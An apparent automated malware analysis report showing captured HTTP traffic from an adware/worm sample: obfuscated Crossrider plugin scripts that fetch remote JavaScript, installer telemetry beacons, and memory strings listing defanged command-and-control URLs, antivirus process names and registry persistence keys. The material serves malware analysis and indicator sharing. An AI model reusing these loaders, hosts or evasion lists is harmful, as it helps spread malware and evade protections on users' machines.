appAPI.hooks.addHook("searchEngine",(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:"google",url:"google",input:"input[name=q]",results:"#rso",result:'<li class="g" />'});this.addEngine({name:"bing",url:"bing.com",input:"input[name=q]",results:"#results > ul",result:'<li class="sa_wr" />'});this.addEngine({name:"yandex",url:"yandex.ru",input:"form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input",results:".b-body-items > ol",result:'<li class="b-serp-item i-bem b-serp-item_js_inited" />'});this.addEngine({name:"yandex",url:"yandex.com",input:"form.b-search input.b-form-input__input,#searchInput",results:".b-serp2-list__portion",result:'<div class="b-serp-block" />'});this.addEngine({name:"yahoo",url:"yahoo.com",input:"input[name=p]",results:"#web ol:eq(0)",result:"<li />"});this.addEngine({name:"yahoo",url:"search.yahoo.com",input:"input[name=p]",results:"#web ol:eq(0)",result:"<li />"});this.addEngine({name:"ask",url:"ask.com",input:"input[name=q]",results:"#lindm",result:'<div class="tsrc_tled" />'});this.addEngine({name:"aol",url:"aol.com",input:"input[name=q]",results:"#w .MSL:eq(0) ul",result:'<li about="null" />'});this.addEngine({name:"aol",url:"search.aol.com",input:"input[name=q]",results:"#w .MSL:eq(0) ul",result:'<li about="null" />'});this.addEngine({name:"youtube",url:"youtube.com",input:"input[name=search_query]",results:"#search-results",result:'&
<<< skipped >>>
GET /plugins/mins/184.js?ver=11&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420026483"
Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT
Cache-Control: max-age=397
Content-Length: 1231
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds020.fr7.c
if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMWQxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFmNWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyODFkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMzYwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFjNWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyNDA4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2MzNDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NGQ0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQyMTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNTQ0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMDcxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzODM3MmUzNDI0MjYyNTQwMzgxZjA4MTUwZDE4MTMzMDFlNWIzMzJmMjQyYjIwMmEzMjJiMzMyMjI5MjIzODNjMzcyZDI0MzczZTIzMjgyZjM0MmMyZDI2MjgzZDI1Mzk0ZTVjNmQ3MDRkMDkwZDBjMWQwZjAyMzkwMzViNTU1OTUwNDE0ZTZjMTE3YQ==', 'yayzflpgyo'); }....
<<< skipped >>>
GET /plugins/mins/102.js?ver=15&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426423396"
Last-Modified: Sun, 15 Mar 2015 12:43:16 GMT
Cache-Control: max-age=621
Content-Length: 1023
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668152.cds012.fr7.c
if (typeof setup2 === 'function') { setup2('MDM3YTU0NTU1NTU1NDYxODFmMWEwODI1MDYxOTU3NGY0NDUyMDMxYTBjMDA0ZTVhNWExYzRhMTMxOTBjMGIxYTA3NWIxYzFiMDIxZjQ0MGQwYTEyMTI1YTFmMTQxMjExMTgwZDBhMTkwNDAxNWIxZjE3NGYwODA2MTkxZTFhMTAxOTQ4MDcwMjBmMWMyNzJmMmIzNjI3M2EzNzIzMzkyNzNjMzUyNjJhMzAyZDMwMzUyNTJhM2QzNDJiMjYyMDM3M2IzOTJmMzEyNzU2MTUwNTA1MjEwZDA0MDcwYjQ1MmYyYjM2MjczYTM3MjMzOTI3M2MzNTI2MmEzNDI1MzQyZjI1MmYzNTM1MmIyYTUzMWQwZDE0NTYzMTI3MzMyNjNhMjYyNjM2MzkyZjJiMmEyZjIxMjYzMDI3M2IzOTJmMzEyNzUyNTg3ZjU1NTU0NDUwNDkwNjBjMDQwNDA2MjAwNzA4NTI1MTRlNWExODAwMDEwNTA2NWU1ZjQ0MDcyNzEzMDYxNzA2MWYxNzJmMDIwMDFlMWY1YTAxMTkwNjA3MTQwNTQwMWIxZjE5NWExNjA3MDYxNjQ0MDQxOTA2MTUwNjE2MDcwZDAwMWY0MDEyMDM0YjE2MWQxNDBhMWUwZTAyNDUxMzA2MTEwNzJhM2IyZjI4M2MzNzIzMjcyNzNjMzEyMTIyMzQyYjIwMjQzMTNiMzEzMDIwMmYzODNiM2EyZjNkMzEyYTJhNDIxMTFiMWUyYzE5MDAxOTEwNDgzYjJmMjgzYzM3MjMyNzI3M2MzMTIxMjIzNDJmMjgyMDJiM2IzNDM4MjEyZjM0NDgxMDE5MTA0ODJhMmEyNzIyMjQzZDJiMjIzZDMxMzAyNzNiMjUzODJiMmEyZjNkMzEyYTJhNDY1YzYxNGU1ODUwNTQ1NzA1MTkxMTE3MDIwMDMxMTQ1NjRmNTU0NDU0NDI2MTEz', 'xptuuudpkn'); }....
GET /plugins/mins/376.js?ver=3&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426525251"
Last-Modified: Mon, 16 Mar 2015 17:00:51 GMT
Cache-Control: max-age=900
Content-Length: 10918
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668153.cds023.fr7.c
(function(){var a=(function(){var l=function(){return appAPI&&appAPI.installer&&appAPI.utils.isFunction(appAPI.installer.getAdditionalInfo)?appAPI.installer.getAdditionalInfo():null;};var j={ie:"10",ni:"11",te:"19",ch:"20",to:"26",sb:"27",op:"28",tc:"29",ff:"30",tf:"39",sf:"40",nv:"50",ms:"51",mf:"52",mc:"53",np:"54",sm:"55",fm:"56",cm:"57",mx:"60"};var p="source_id";var k="776";var e="__PageActive__";var q=new Date(2013,0,1);var f=1000*60*2;var n=1000*60*10;var o=(appAPI&&appAPI.installer&&typeof appAPI.installer.getUnixTime==="function")?appAPI.installer.getUnixTime()*1000:((new Date(2013,0,1)).getTime());var h=l;var g=[{pluginId:288,httpUrl:"hXXp://istatic.datafastguru.info/fo/min/crqc.js?hid=__CROSSRIDER_USER_ID__&bname=__CROSSRIDER_APP_NAME__&subid=__CROSSRIDER_EXTENDED_SUB_ID__",delay:0},{pluginId:242,httpUrl:"hXXp://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME__",httpsUrl:"hXXps://inst.shoppingate.info/js/sg_bg.js?AFFILIATE_ID=crsrdr&SUB_DISTRIBUTER_ID=__CROSSRIDER_EXTENDED_SUB_ID__&BRAND_DISPLAY_NAME=__CROSSRIDER_APP_NAME__",delay:0},{pluginId:385,httpUrl:"hXXp://api.jollywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_SUB_ID__&name=__CROSSRIDER_APP_NAME__",httpsUrl:"hXXps://api.jollywallet.com/affiliate/client?dist=329&sub=__CROSSRIDER_EXTENDED_SUB_ID__&name=__CROSSRIDER_APP_NAME__",delay:0},{pluginId:390,httpUrl:"hXXp://cdncache-a.akamaihd.net/sub/h0982be/__CROSSRIDER_EXTENDED_SUB_ID__/l.
<<< skipped >>>
GET /plugins/mins/354.js?ver=2&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418039174"
Last-Modified: Mon, 08 Dec 2014 11:46:14 GMT
Cache-Control: max-age=183
Content-Length: 122978
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668153.cds009.fr7.c
__CTG_MAPPING__={"1":["d908e50170d7cb46a92fdbff0d73bb5d","0a64c81275732dcf0eb51fc0fdecfaa7","edb18644366c10cc24c58f6fb14ca9f4","15e39ed909ac8e17ae3cc3c91cd7ae9f","dccefc9affe37ba60b49d0a4789ce042","55a7d0f3833487778c3bdff8b2096e93","0212ae9fc1eeb53f9f641335b804d75e","d5e783fe22abe91aae7179d10a958497","9c8a818246bc677ef54725340e9c5a98","6871592501ed31709e241750c4363fce","1c5e3f677b22b8257c1df15a70e7df26","daf4c4488123ddadb30a7adaadb18b54","11fbd0aa23a016619379552c438b081a","fcaed5b82116cd700a0949772ad8ff49","6ac10c5f77cf4309c731a1edca41f357","5c83bc2a9fe11b248ee7a0577c7d8fdd","b4724ce8e3ac8d971ea648c70f1f3a28","5cfdb867e96374c7883b31d6928cc4cb","5bc25469aea12b844db6b49146c3e0ed","15830c2f3218394a63d70b23d235cc1c","7f5e73ea77ef99619089c3857dafdcb4","029c1c42a9160c3cf3db1a687f11ff72","e84400c002083678aa69041045895fae","da0239e7da0330fb26ef37dd1d940044","993439d6f7a4548cae1381c9073cbee1","24414caa6316a5694f77499fa604e5b1","340d70f50a7a4507bc874c8108bb45bc","2e44b2f1bf1b2b87d2be9f94ad2a2a35","5484845885ffd608ebb0ad1ac39434d4","96eb5194f361b233bf8fb9a80267f1de","91e4f116b8a4f5258b982d3c10910bdf","5638298177fc6af5190590244d6d8035","7712b7ac7ec5d5966fb35b1425d0283f","1080cee006e84c91858613ce7dde99fb","428d0f3d623a15db6cacb689e86b4352","8b25ca5c09e10312a1567fb3d7f82c07","84dcb17eaafb9d32908759a607838c8b","fcbed3a6b1e592c8efddf3f925b26b7f","7eae142b683afcf5aee231291c679877","9bcd814058bcf8f6497f0495e0a2fd71","6bb8719fca4581212b3aa47da8755163","adb2121658b69c9a701f270c8faba02f","5694f231cd01d8222d59557c56cef9a7","b7444e18
<<< skipped >>>
GET /plugins/mins/246.js?ver=17&rnd=6334 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1424173488"
Last-Modified: Tue, 17 Feb 2015 11:44:48 GMT
Cache-Control: max-age=900
Content-Length: 7448
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668153.dop002.fr7.t,1427668153.cds009.fr7.c
var _0x8f59=["10","11","19","20","26","27","28","29","30","39","40","50","51","52","53","54","55","56","57","60","installer","getAdditionalInfo","isFunction","utils","isDefined","asw","isArray","length","toLowerCase","platform","np","ni","browser_name","__BROWSER_NAME__","getIds","installer_verifier","","string","charCodeAt","replace","match","apply","fromCharCode","Base64","decode","call","parse","JSON","monetization","internal","plugins","un","def","ined","pluginId","getExtendedSubId","function","slice","getSubId","getTime","_","join","na","httpUrl","__RND__","g","__ADVANCE_USER__","__CROSSRIDER_ASW__","__CROSSRIDER_INSTALL_TIME__","getUnixTime","__CROSSRIDER_COUNTRY_CODE__","getCountry","__CROSSRIDER_EXTENDED_SUB_ID__","__CROSSRIDER_USER_ID__","userId","appInfo","__CROSSRIDER_VERIFIER__","__CROSSRIDER_INSTALLER_USER_ID__","getUserId","__CROSSRIDER_APP_ID__","appID","__CROSSRIDER_BROWSER__","__CROSSRIDER_CAMP_ID__","getCampaignId","__CROSSRIDER_LIGHT_SUB_ID__","__CROSSRIDER_APP_NAME__","name","__CROSSRIDER_SUB_ID__","httpsUrl","inlineJS","waitForBodyReady","undefined","addRemoteJS"];setup2=function(m,k){var h={ie:_0x8f59[0],ni:_0x8f59[1],te:_0x8f59[2],ch:_0x8f59[3],to:_0x8f59[4],sb:_0x8f59[5],op:_0x8f59[6],tc:_0x8f59[7],ff:_0x8f59[8],tf:_0x8f59[9],sf:_0x8f59[10],nv:_0x8f59[11],ms:_0x8f59[12],mf:_0x8f59[13],mc:_0x8f59[14],np:_0x8f59[15],sm:_0x8f59[16],fm:_0x8f59[17],cm:_0x8f59[18],mx:_0x8f59[19]},i=function(){return appAPI[_0x8f59[20]]&&appAPI[_0x8f59[23]][_0x8f59[22]](appAPI[_0x8f59[20]][_0x8f59[21]])?appAPI[
<<< skipped >>>
GET /installer_updates/001360/update.json HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 16:42:02 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1395746822"
Last-Modified: Tue, 25 Mar 2014 11:27:02 GMT
Cache-Control: max-age=854
Content-Length: 39
Content-Type: text/plain; charset=UTF-8
X-HW: 1427668128.dop007.fr7.t,1427668128.cds024.fr7.s,1427668127.dop005.se1.r,1427668128.cds015.se1.c,1427668128.cds024.fr7.p
{"update_from_version":"NA","url":"NA"}HTTP/1.1 200 OK..Date: Sun, 29 Mar 2015 16:42:02 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1395746822"..Last-Modified: Tue, 25 Mar 2014 11:27:02 GMT..Cache-Control: max-age=854..Content-Length: 39..Content-Type: text/plain; charset=UTF-8..X-HW: 1427668128.dop007.fr7.t,1427668128.cds024.fr7.s,1427668127.dop005.se1.r,1427668128.cds015.se1.c,1427668128.cds024.fr7.p..{"update_from_version":"NA","url":"NA"}..
GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=0&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1427668122&procruntime=6&rnd=1427668128 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 9/C9HI4pJESP/NiZTc7FSTFSybRP1rJLyKnroec5aBB9aKP0a/Om1k/AaNQxEs hDe BapG6zIA=
x-amz-request-id: 9E01DCC0110FBE03
Date: Sun, 29 Mar 2015 22:28:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 9/C9HI4pJESP/NiZTc7FSTFSybRP1rJLyKnroec5aBB9aKP0a/Om1k/AaNQxEs hDe BapG6zIA=..x-amz-request-id: 9E01DCC0110FBE03..Date: Sun, 29 Mar 2015 22:28:50 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=111&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1427668122&procruntime=41&rnd=1427668163 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: mkEOHDM1Vypc8tlMASGGMuRgveUrP8Tt/MwC7d4 BJAoI3kSQikFw75bI6 5g1QWXNloXpiBPyA=
x-amz-request-id: 0FB85ED08DFF4B6D
Date: Sun, 29 Mar 2015 22:29:24 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
Map
The Worm connects to the servers at the folowing location(s):
Strings from Dumps
netsh.exe_3068:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
MPRAPI.dll
MPRAPI.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
RASAPI32.dll
RASAPI32.dll
USER32.dll
USER32.dll
iphlpapi.dll
iphlpapi.dll
[%S] %S
[%S] %S
netsh.pdb
netsh.pdb
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
GetProcessHeap
GetProcessHeap
GetConsoleOutputCP
GetConsoleOutputCP
ntdll.dll
ntdll.dll
NETSH.EXE
NETSH.EXE
MatchCmdLine
MatchCmdLine
MatchTagsInCmdLine
MatchTagsInCmdLine
{X-X-X-XX-XXXXXX}
{X-X-X-XX-XXXXXX}
netsh.exe
netsh.exe
Error %d in FormatMessageW()
Error %d in FormatMessageW()
select * from Win32_OperatingSystem
select * from Win32_OperatingSystem
\\%s\root\cimv2
\\%s\root\cimv2
5.1.2600.5512 (xpsp.080413-0852)
5.1.2600.5512 (xpsp.080413-0852)
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
LFirst, add the protocol to the transport, and then add it to the interface.
LFirst, add the protocol to the transport, and then add it to the interface.
*The requested transport is not available.
*The requested transport is not available.
%1!s! ipmontr.dll
%1!s! ipmontr.dll
The above command installs ipmontr.dll in netsh.
The above command installs ipmontr.dll in netsh.
is removed, it is no longer supported by netsh.
is removed, it is no longer supported by netsh.
The command cannot be executed.
The command cannot be executed.
*Windows cannot open the file named %1!s!.
*Windows cannot open the file named %1!s!.
.The commit call to %1!s! cannot be completed.
.The commit call to %1!s! cannot be completed.
.Sets the current machine on which to operate.
.Sets the current machine on which to operate.
name - Name of the machine on which to operate
name - Name of the machine on which to operate
Sets the current machine on which to operate. If a machine name
Sets the current machine on which to operate. If a machine name
%1!s! open c:\logfiles\logfile.txt
%1!s! open c:\logfiles\logfile.txt
.Error creating key for %1!s! in the registry.
.Error creating key for %1!s! in the registry.
.Error deleting key for %1!s! in the registry.
.Error deleting key for %1!s! in the registry.
netsh.exe_3068_rwx_00480000_00002000:
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.text
.text
netsh.exe_3068_rwx_004D0000_00001000:
|netsh.exeM_3068_
|netsh.exeM_3068_
Explorer.EXE_884_rwx_014D0000_00002000:
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.text
.text
Explorer.EXE_884_rwx_02050000_00001000:
|explorer.exeM_884_
|explorer.exeM_884_
Explorer.EXE_884_rwx_024F0000_01033000:
c:\windows
c:\windows
hXXp://VVV.ledyazilim.com/logo.gif
hXXp://VVV.ledyazilim.com/logo.gif
hXXp://ksandrafashion.com/logo.gif
hXXp://ksandrafashion.com/logo.gif
hXXp://VVV.lafyeri.com/images/logo.gif
hXXp://VVV.lafyeri.com/images/logo.gif
hXXp://kulppasur.com/logo.gif
hXXp://kulppasur.com/logo.gif
hXXp://toalladepapel.com.ar/images/logo.gif
hXXp://toalladepapel.com.ar/images/logo.gif
hXXp://VVV.ecole-saint-simon.net/index_top/logo.gif
hXXp://VVV.ecole-saint-simon.net/index_top/logo.gif
hXXp://lazarea.ro/images/logo.gif
hXXp://lazarea.ro/images/logo.gif
hXXp://koonadance2.com/images/logo.gif
hXXp://koonadance2.com/images/logo.gif
hXXp://kuplu.bel.tr/images/logo.gif
hXXp://kuplu.bel.tr/images/logo.gif
hXXp://VVV.liderancaspoliticas.com.br/logo.gif
hXXp://VVV.liderancaspoliticas.com.br/logo.gif
hXXp://VVV.legalbilgisayar.com/img/logo.gif
hXXp://VVV.legalbilgisayar.com/img/logo.gif
hXXp://lifecom24.co.cc/images/logo.gif
hXXp://lifecom24.co.cc/images/logo.gif
%System%\drivers\ghltmn.sys
%System%\drivers\ghltmn.sys
12047188183
12047188183
SHELL32.DLL
SHELL32.DLL
ShellExecuteA
ShellExecuteA
KERNEL32.DLL
KERNEL32.DLL
.text
.text
hXXp://89.119.67.154/testo5/
hXXp://89.119.67.154/testo5/
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet777.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet888.info/home.gif
hXXp://kukutrustnet987.info/home.gif
hXXp://kukutrustnet987.info/home.gif
h.rdata
h.rdata
H.data
H.data
.reloc
.reloc
ntoskrnl.exe
ntoskrnl.exe
Opera/8.89 (Windows NT 6.0; U; en)
Opera/8.89 (Windows NT 6.0; U; en)
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://VVV.klkjwre9fqwieluoi.info/
hXXp://kukutrustnet777888.info/
hXXp://kukutrustnet777888.info/
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\ShellNoRoam\MUICache
Software\Microsoft\Windows\ShellNoRoam\MUICache
%s:*:Enabled:ipsec
%s:*:Enabled:ipsec
NOTEPAD.EXE
NOTEPAD.EXE
WINMINE.EXE
WINMINE.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
GdiPlus.dll
GdiPlus.dll
hXXp://
hXXp://
hXXp://klkjwre77638dfqwieuoi888.info/
hXXp://klkjwre77638dfqwieuoi888.info/
VVV.microsoft.com
VVV.microsoft.com
?%x=%d
?%x=%d
&%x=%d
&%x=%d
SYSTEM.INI
SYSTEM.INI
USER32.DLL
USER32.DLL
.%c%s
.%c%s
\\.\abp470n5
\\.\abp470n5
WINDOWS
WINDOWS
NTDLL.DLL
NTDLL.DLL
autorun.inf
autorun.inf
ADVAPI32.DLL
ADVAPI32.DLL
win%s.exe
win%s.exe
%s.exe
%s.exe
WININET.DLL
WININET.DLL
InternetOpenUrlA
InternetOpenUrlA
avast! Web Scanner
avast! Web Scanner
Avira AntiVir Premium WebGuard
Avira AntiVir Premium WebGuard
BackWeb Plug-in - 4476822
BackWeb Plug-in - 4476822
cmdGuard
cmdGuard
cmdAgent
cmdAgent
Eset HTTP Server
Eset HTTP Server
ProtoPort Firewall service
ProtoPort Firewall service
SpIDer FS Monitor for Windows NT
SpIDer FS Monitor for Windows NT
Symantec Password Validation
Symantec Password Validation
tcpsr
tcpsr
WebrootDesktopFirewallDataService
WebrootDesktopFirewallDataService
WebrootFirewall
WebrootFirewall
%d%d.tmp
%d%d.tmp
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
%s\%s
%s\%s
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
%s\Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
Software\Microsoft\Windows\CurrentVersion\Ext\Stats
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Explorer.exe
Explorer.exe
ASHWEBSV.
ASHWEBSV.
DRWEB32W.
DRWEB32W.
DRWEBSCD.
DRWEBSCD.
DRWEBUPW.
DRWEBUPW.
DWEBLLIO
DWEBLLIO
DWEBIO
DWEBIO
FSGUIEXE.
FSGUIEXE.
MCVSSHLD.
MCVSSHLD.
NPFMSG.
NPFMSG.
SYMSPORT.
SYMSPORT.
WEBPROXY.
WEBPROXY.
WEBSCANX.
WEBSCANX.
WEBTRAP.
WEBTRAP.
sfc_os.dll
sfc_os.dll
M_%d_
M_%d_
%c%d_%d
%c%d_%d
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
GetWindowsDirectoryA
GetWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegCloseKey
RegCloseKey
SHFileOperationA
SHFileOperationA
.rdata
.rdata
.data
.data
.xdata
.xdata
@.CRT
@.CRT
GUrlA'G5
GUrlA'G5
HTTP)s'cfp
HTTP)s'cfp
Lxo.ENHCDM
Lxo.ENHCDM
wWEBWUPD
wWEBWUPD
n .pZ
n .pZ
'()* ,-./01230 0
'()* ,-./01230 0
.HpT.#[3
.HpT.#[3
av%xQ
av%xQ
ADVAPI32.dll
ADVAPI32.dll
MSVCRT.dll
MSVCRT.dll
SHELL32.dll
SHELL32.dll
USER32.dll
USER32.dll
WS2_32.dll
WS2_32.dll